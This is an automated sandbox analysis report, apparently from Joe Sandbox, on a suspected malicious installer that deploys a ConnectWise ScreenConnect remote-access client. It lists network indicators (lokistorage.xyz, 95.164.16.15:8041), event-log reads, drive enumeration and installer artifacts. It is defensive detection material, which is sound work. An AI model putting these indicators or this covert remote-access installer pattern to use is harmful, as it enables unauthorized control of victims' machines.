Windows Analysis Report
tmpzNIZ0YQ.exe

EXE planting / hijacking vulnerabilities found

Compliance

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe

EXE: msiexec.exe

PE / OLE file has a valid certificate

Uses 32bit PE files

Source: tmpzNIZ0YQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: tmpzNIZ0YQ.exe

Static PE information: certificate valid

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: tmpzNIZ0YQ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544556921.0000000002962000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1543436866.0000000001050000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: tmpzNIZ0YQ.exe
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1477295453.000000000026D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: tmpzNIZ0YQ.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: tmpzNIZ0YQ.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: tmpzNIZ0YQ.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: tmpzNIZ0YQ.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: tmpzNIZ0YQ.exe, MSI934C.tmp.3.dr, 418a05.msi.3.dr, 418a03.msi.3.dr, 418a04.rbs.3.dr, MSI8E59.tmp.3.dr, MSI9148.tmp.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2677197803.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: tmpzNIZ0YQ.exe, MSI7FE2.tmp.2.dr, 418a05.msi.3.dr, 418a03.msi.3.dr, setup.msi.0.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1542649947.0000000001012000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544556921.0000000002962000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1543436866.0000000001050000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbI source: tmpzNIZ0YQ.exe
Source:	Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2677197803.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2677197803.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: tmpzNIZ0YQ.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: tmpzNIZ0YQ.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr

Spreading

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Networking

Enables network access during safeboot for specific services

Source: C:\Windows\System32\msiexec.exe

Registry value created: NULL Service

Performs DNS queries to domains with low reputation

Source:

DNS query: lokistorage.xyz

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.9:49708 -> 95.164.16.15:8041

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NASSIST-ASGI NASSIST-ASGI

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49712
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49709

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: lokistorage.xyz

Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: ScreenConnect.ClientService.exe, 00000008.00000002.2662716124.0000000001E0F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr	String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
Source: rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr	String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr	String found in binary or memory: http://wixtoolset.org/releases/
Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: ScreenConnect.WindowsCredentialProvider.dll.3.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ScreenConnect.Core.dll.3.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Detected potential unwanted application

Source: tmpzNIZ0YQ.exe

PE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US

Contains functionality to launch a process as a different user

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Code function: 8_2_058518D0 CreateProcessAsUserW,

8_2_058518D0

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\418a03.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{BF3035CA-924F-7DEB-610F-14962D2B8EE2}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8E59.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9148.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI934C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\418a05.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\418a05.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{BF3035CA-924F-7DEB-610F-14962D2B8EE2}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{BF3035CA-924F-7DEB-610F-14962D2B8EE2}\DefaultIcon	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Windows\Installer\wix{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.SchedServiceConfig.rmi	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\qaw1ymml.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\qaw1ymml.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI9148.tmp

Detected potential crypto function

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Code function: 0_2_05E09C90	0_2_05E09C90
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Code function: 0_2_05E0EC53	0_2_05E0EC53
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Code function: 0_2_05E0EE50	0_2_05E0EE50
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Code function: 0_2_05E06AB8	0_2_05E06AB8
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Code function: 0_2_05E06080	0_2_05E06080
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Code function: 0_2_05E06AA8	0_2_05E06AA8
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Code function: 0_2_05E6012B	0_2_05E6012B
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_0151D488	8_2_0151D488
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FF886A57098	9_2_00007FF886A57098
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FF886A574C8	9_2_00007FF886A574C8
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FF886D66DFB	9_2_00007FF886D66DFB
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FF886D603F2	9_2_00007FF886D603F2
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FF886D65CB6	9_2_00007FF886D65CB6
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FF886A77098	10_2_00007FF886A77098
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FF886A708F2	10_2_00007FF886A708F2
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FF886D824EC	10_2_00007FF886D824EC
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FF886D8DC86	10_2_00007FF886D8DC86
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FF886D85966	10_2_00007FF886D85966
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FF886D8EA32	10_2_00007FF886D8EA32
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FF886D861F7	10_2_00007FF886D861F7
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FF886D85900	10_2_00007FF886D85900

PE file contains executable resources (Code or Archives)

Source: tmpzNIZ0YQ.exe	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: tmpzNIZ0YQ.exe	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: tmpzNIZ0YQ.exe	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: tmpzNIZ0YQ.exe	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: tmpzNIZ0YQ.exe	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Sample file is different than original file name gathered from version info

Source: tmpzNIZ0YQ.exe, 00000000.00000002.1418481996.00000000060AB000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000002.1418481996.00000000060AB000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSfxCA.dllL vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000002.1418481996.00000000060AB000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamewixca.dll\ vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000002.1418481996.00000000060AB000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000002.1417006147.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamelibwebp.dllB vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000002.1417006147.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamezlib.dll2 vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000002.1417006147.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelibwebp.dllB vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamezlib.dll2 vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000001036000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs tmpzNIZ0YQ.exe
